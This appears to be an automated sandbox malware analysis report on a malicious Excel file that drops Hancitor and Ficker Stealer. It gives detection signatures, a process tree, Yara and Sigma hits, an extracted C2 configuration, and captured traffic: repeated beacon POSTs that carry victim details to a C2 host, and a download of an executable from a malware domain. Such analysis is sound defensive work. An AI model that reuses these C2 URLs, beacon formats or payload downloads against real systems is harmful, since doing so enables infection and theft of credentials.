Windows Analysis Report 0722_2857746751.xls

Overview

General Information

Sample Name: 0722_2857746751.xls
Analysis ID: 452590
MD5: 97538e922b86b2ae95625d1e11e6aaf1
SHA1: 928e4d89b379bdd7c894787431a8d0b42f28a5a4
SHA256: 83c9c9beaca0a147e23995b84792f56cd130ccf262147374bd1114c2ac698fee

Detection

Ficker Stealer, Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ficker Stealer
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains OLE streams with PE executables
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document exploit detected (process start blacklist hit)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • imjppdmg.exe (PID: 1360 cmdline: /Migration MD5: 3716DEC1E0B88BB19968BBC2659B02A1)
    • rundll32.exe (PID: 2384 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • svchost.exe (PID: 2292 cmdline: C:\Windows\System32\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp | JoeSecurity_Ficker_Stealer_1 | Yara detected Ficker Stealer | Joe Security |
00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
Process Memory Space: svchost.exe PID: 2292 | JoeSecurity_Ficker_Stealer_1 | Yara detected Ficker Stealer | Joe Security |
Process Memory Space: rundll32.exe PID: 2364 | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.3.rundll32.exe.1d438c.0.raw.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
5.3.rundll32.exe.1d438c.0.raw.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
5.3.rundll32.exe.1d438c.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
5.3.rundll32.exe.1d438c.0.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
5.2.rundll32.exe.340000.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started | Author: David Burkett | Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2404, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ProcessId: 2384
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2364, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 2292

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://s0lom0n.ru/7hsjfd9w4refsd.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp | Malware Configuration Extractor: Hancitor {"Campaign Id": "2207_xwpi67", "C2 list": ["http://tholeferli.com/8/forum.php", "http://aidgodown.ru/8/forum.php", "http://relifleappin.ru/8/forum.php"]}
Multi AV Scanner detection for domain / URL
Source: pospvisis.com | Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: 0722_2857746751.xls | Virustotal: Detection: 29%
Source: 0722_2857746751.xls | ReversingLabs: Detection: 22%
Source: 5.2.rundll32.exe.340000.0.unpack | Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00342CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342CD0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00342D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D17
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00342D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D98
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00342D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D78
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00342D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_00342D55
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040BAB5 CryptUnprotectData,7_2_0040BAB5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\532.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 532.dll.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 54.235.88.121:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49173
Source: Traffic | Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49173 -> 95.213.179.67:80
Source: Traffic | Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
Source: Traffic | Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://tholeferli.com/8/forum.php
Source: Malware configuration extractor | URLs: http://aidgodown.ru/8/forum.php
Source: Malware configuration extractor | URLs: http://relifleappin.ru/8/forum.php
May check the online IP address of the machine
Source: C:\Windows\SysWOW64\rundll32.exe | DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Thu, 22 Jul 2021 14:11:04 GMT | Content-Type: application/octet-stream | Content-Length: 272910 | Connection: keep-alive | Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT | ETag: "60c0e5a8-42a0e" | Accept-Ranges: bytes
Source: Joe Sandbox View | IP Address: 8.211.241.0
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: api.ipify.org | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /8/forum.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: tholeferli.com | Content-Length: 110 | Cache-Control: no-cache | Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Source: global traffic | HTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: s0lom0n.ru | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /?format=xml HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: api.ipify.org | Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
